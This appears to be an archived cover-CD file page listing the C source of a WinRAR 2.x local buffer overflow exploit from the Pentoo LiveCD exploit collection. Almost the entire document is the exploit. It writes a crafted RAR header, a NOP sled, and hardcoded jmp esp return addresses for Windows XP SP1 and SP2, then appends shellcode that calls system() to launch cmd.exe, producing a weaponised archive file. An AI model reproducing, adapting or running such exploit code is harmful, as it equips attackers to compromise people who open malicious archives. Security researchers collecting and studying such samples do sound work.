Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / packer / winrar / winrar.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 3.2 KB | 117 lines

/* * WinRar local buffer overflow exploit V1.0 * Coded By ATmaCA * Copyright ⌐ 2004 ProGroup Software, Inc. * E-Mail:atmaca@prohack.net * Web:www.prohack.net * Usage:\r\nexploit <Target> <OutputPath> * Targets: * 1 - WinXP SP1 user32.dll [0x77D718FC] * 2 - WinXP SP2 user32.dll [0x77D8AF0A] * Example:exploit 1 myrar.rar */ /* * All WinRar 2.x series are effected * 3.x series not effected * If you want to test and you do not have WinRar V2.x * You can download it from http://atmaca.prorat.net/Src/winrar.zip */ #include <stdio.h> #include <stdlib.h> #include <conio.h> #ifdef __BORLANDC__ #include <mem.h> #endif #define NOP 0x90 /*crafted rar header*/ char winrar_header[] = "\x52\x61\x72\x21\x1A\x07\x00\xCF\x90\x73\x00\x00\x0D\x00\x00\x00" "\x00\x00\x00\x00\x4A\x91\x74\x80\x80\x35\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x02\x00\x00\x00\x00\x12"; /*launch a local cmd.exe*/ char shellcode[]= "\x68" // push "cmd " // cmd "\x8B\xC4" // mov eax,esp "\x50" // push eax "\xB8\xc7\x93\xC2\x77" // mov eax,77C293C7 (address of system() on WinXP SP2 - msvcrt.dll) "\xFF\xD0" // call eax ; char *target[]= //return addr { "\xFC\x18\xD7\x77", //User32 jmp esp addr WinXp Sp1 "\x0A\xAF\xD8\x77" //User32 jmp esp addr WinXp Sp2 }; char *sysadrr[]= { "\x44\x80\xC2\x77", //77C28044 XP Sp1 msvcrt.dll system() "\xC7\x93\xC2\x77" //77C293C7 XP Sp2 msvcrt.dll system() }; FILE *di; int targetnum; int i; void main(int argc, char *argv[]) { if (argc < 3) { printf("\r\nWinRar local buffer overflow exploit V1.0\r\n", argv[0]); printf("Coded By ATmaCA\r\n"); printf("Copyright ⌐ 2004 ProGroup Software, Inc.\r\n"); printf("E-Mail:atmaca@prohack.net\r\n"); printf("Web:www.prohack.net\r\n\r\n"); printf("Usage:\r\nexploit <Target> <OutputPath>\r\n\r\n",argv[0]); printf("Targets:\n"); printf("1 - WinXP SP1 english user32.dll [0x77D718FC]\n"); printf("2 - WinXP SP2 english user32.dll [0x77D8AF0A]\n"); printf("Example:exploit 1 myrar.rar\n"); return; } targetnum = atoi(argv[1]) - 1; if( (di=fopen(argv[2],"wb")) == NULL ) { printf("Error opening file!\n"); return; } for(i=0;i<sizeof(winrar_header)-1;i++) fputc(winrar_header[i],di); /*stuff in a couple of NOPs*/ for(i=0;i<1051;i++) fputc(NOP,di); fprintf(di,"%s",target[targetnum]); //EIP for(i=0;i<50;i++) //NOPs fputc(NOP,di); memcpy(shellcode+9,sysadrr[targetnum],4); //system() addr /*Overwriting the return address (EIP) with JMP ESP address located somewhere in process space */ for(i=0;i<sizeof(shellcode)-1;i++) fputc(shellcode[i],di); for(i=0;i<50;i++) //NOPs fputc(NOP,di); printf("Exploit rar file %s has been generated!\n",argv[2]); fclose(di); }